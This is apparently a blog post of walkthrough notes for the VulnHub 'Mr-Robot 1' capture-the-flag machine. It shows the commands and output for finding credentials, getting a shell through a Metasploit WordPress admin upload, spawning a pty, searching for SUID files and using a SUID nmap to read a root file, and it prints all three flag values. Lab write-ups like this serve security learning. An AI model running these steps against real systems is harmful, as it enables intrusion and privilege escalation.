Mr-Robot 1 (VulnHub)

https://www.vulnhub.com/entry/mr-robot-1,151/
---
https://192.168.1.240/robots.txt


User-agent: *
fsocity.dic
key-1-of-3.txt
---
https://192.168.1.240/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
---
cat fsocity.dic | sort | uniq -c | sort -hr | tail -15
     75 002
     75 001
     75 000080
     75 000000
     75 000
      1 uHack
      1 psychedelic
      1 imhack
      1 iamalearn
      1 ER28-0652
      1 c3fcd3d76192e4007dfb496cca67e13b (another key?)
      1 ABCDEFGHIJKLMNOPQRSTUVWXYZ
      1 abcdefghijklmnopq
      1 abcdEfghijklmnop
      1 abcdefghijklmno
---
http://192.168.1.240/wp-login.php

elliot
ER28-0652
---
use exploit/unix/webapp/wp_admin_shell_upload

python -c 'import pty;pty.spawn("/bin/bash")'
su robot (Google md5 value)
---
robot@linux:~$ ls -alh
ls -alh
total 16K
drwxr-xr-x 2 root  root  4.0K Nov 13  2015 .
drwxr-xr-x 3 root  root  4.0K Nov 13  2015 ..
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5
---
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f95
---
find / -perm +6000 -type f -ls 2>/dev/null
 15068   44 -rwsr-xr-x   1 root     root        44168 May  7  2014 /bin/ping
 15093   68 -rwsr-xr-x   1 root     root        69120 Feb 12  2015 /bin/umount
 15060   96 -rwsr-xr-x   1 root     root        94792 Feb 12  2015 /bin/mount
 15069   44 -rwsr-xr-x   1 root     root        44680 May  7  2014 /bin/ping6
 15085   40 -rwsr-xr-x   1 root     root        36936 Feb 17  2014 /bin/su
 36202   16 -rwxr-sr-x   3 root     mail        14592 Dec  3  2012 /usr/bin/mail-touchlock
 36231   48 -rwsr-xr-x   1 root     root        47032 Feb 17  2014 /usr/bin/passwd
 36216   32 -rwsr-xr-x   1 root     root        32464 Feb 17  2014 /usr/bin/newgrp
 36298  412 -rwxr-sr-x   1 root     utmp       421768 Nov  7  2013 /usr/bin/screen
 36202   16 -rwxr-sr-x   3 root     mail        14592 Dec  3  2012 /usr/bin/mail-unlock
 36202   16 -rwxr-sr-x   3 root     mail        14592 Dec  3  2012 /usr/bin/mail-lock
 36041   44 -rwsr-xr-x   1 root     root        41336 Feb 17  2014 /usr/bin/chsh
 36056   36 -rwxr-sr-x   1 root     crontab     35984 Feb  9  2013 /usr/bin/crontab
 36038   48 -rwsr-xr-x   1 root     root        46424 Feb 17  2014 /usr/bin/chfn
 36034   56 -rwxr-sr-x   1 root     shadow      54968 Feb 17  2014 /usr/bin/chage
 36148   68 -rwsr-xr-x   1 root     root        68152 Feb 17  2014 /usr/bin/gpasswd
 36112   24 -rwxr-sr-x   1 root     shadow      23360 Feb 17  2014 /usr/bin/expiry
 36080   16 -rwxr-sr-x   1 root     mail        14856 Dec  7  2013 /usr/bin/dotlockfile
 36349  152 -rwsr-xr-x   1 root     root       155008 Mar 12  2015 /usr/bin/sudo
 36337  280 -rwxr-sr-x   1 root     ssh        284784 May 12  2014 /usr/bin/ssh-agent
 36388   20 -rwxr-sr-x   1 root     tty         19024 Feb 12  2015 /usr/bin/wall
 34835  496 -rwsr-xr-x   1 root     root       504736 Nov 13  2015 /usr/local/bin/nmap
...
---
robot@linux:~$ nmap -iL /root/key-3-of-3.txt localhost
nmap -iL /root/key-3-of-3.txt localhost

Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2016-09-11 11:25 UTC
Failed to resolve given hostname/IP: 04787ddef27c3dee1ee161b21670b4e4.
Note that you can't use '/mask' AND '[1-4,7,100-]' style IP ranges
WARNING: No targets were specified, so 0 hosts scanned.
Nmap finished: 0 IP addresses (0 hosts up) scanned in 0.314 seconds
robot@linux:~$

No comments:

Post a Comment